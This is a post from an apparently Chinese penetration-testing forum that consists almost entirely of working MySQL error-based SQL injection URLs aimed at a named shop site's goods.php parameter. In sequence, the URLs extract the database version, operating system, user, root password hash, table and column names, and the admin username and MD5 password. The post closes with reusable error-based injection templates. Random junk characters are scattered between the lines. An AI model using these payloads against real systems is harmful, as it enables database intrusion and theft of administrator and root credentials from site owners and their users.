找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 盲注详细内容
返回列表 发新帖
查看: 2913|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 7 \. d+ l! _$ A. I' L
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%238 c8 k6 E, \% a, F* r" \: A& K! h
; `- @' D9 Q5 g
判断系统1 w, Z6 G- X* L' j' I- f2 y( y
. ^, b! ^- H9 y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; L; t6 [5 |2 Z$ K
7 x2 h! Y1 a) Q/ W. g7 D
. w+ d1 G7 h0 {5 M, u3 Z+ _- b
/ L' v9 e& a8 V, k0 ~& T5 u' o当前 user()
2 v$ A0 X1 |4 m) X% m, s# {5 X
; Y& V! Q! A* t& Z% G' T' nhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 e& e: K0 F. r

& D4 e$ o& |4 S, x
- W" Z* h* W, K3 F* b5 H' y
- t# }+ K  `5 ?" l当前 database()1 u8 b, h( \$ g- L5 V* I
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! n$ G# o) w: H5 g3 ^) V' Z

+ O  F3 [" F: t0 e8 S) O5 P$ ?4 s3 e4 E/ M7 B
7 y4 N1 n, q0 A5 i
6 a! x) R! V1 i. N- U6 o' o
root hash
: D  X$ s7 e. g. \5 d% M
, X1 G; E% E5 G/ o" Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 N4 }0 D, Q0 X4 P5 o
* A* h+ j! j. K3 k# \5 b
; N: n& ?4 D& [, v
  Z0 L- Q8 y' Y# c9 s. g% K( A5 L: L当前 数据库表名% x; }9 B# u2 b4 y& ^
2 H3 `) s+ z8 X$ g$ G( e6 u
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. ~0 j9 p6 y/ a1 v: F) H, c

- \) l( u- ], y. U
* }8 I. q$ `" [6 Z  t7 s# h- v$ f, h+ o' Z  V: ?
当前 数据库 user_name 字段$ j; r* u# s: q) L- A0 r

" q; h/ ]7 E; m9 x- O/ Rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. ]- V5 q( T2 r0 A

+ \6 ^0 A9 k% V. E" c当前 数据库 字段 password
/ e2 o. I- H; X" Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' G, k0 q/ G1 g0 Z& I. C
2 A9 j. R7 {3 s2 M3 Q& s

; s) P* O0 f& w- i7 n( C5 o4 y' n+ I' n' G+ m( b
获得 admin passwd(md5)
& y2 r- P! d) a) L; M. f& O4 }( z& r% j1 d. ~% B5 k! T! G, @
- w7 ^- V5 n3 x% j8 ]3 O
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23+ s2 ?* _2 S% J6 L

3 h1 X5 _; t7 H+ X# C2 G' M报错注射
6 `6 [% d7 Z- X5 p5 e9 _/ x2 OSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)9 @, I$ ]" _8 q
* I- x. v* `( w& b! c: P; ~
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
( o, K) Q1 J0 |/ Q0 u2 ]6 R8 |  H: |, f
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表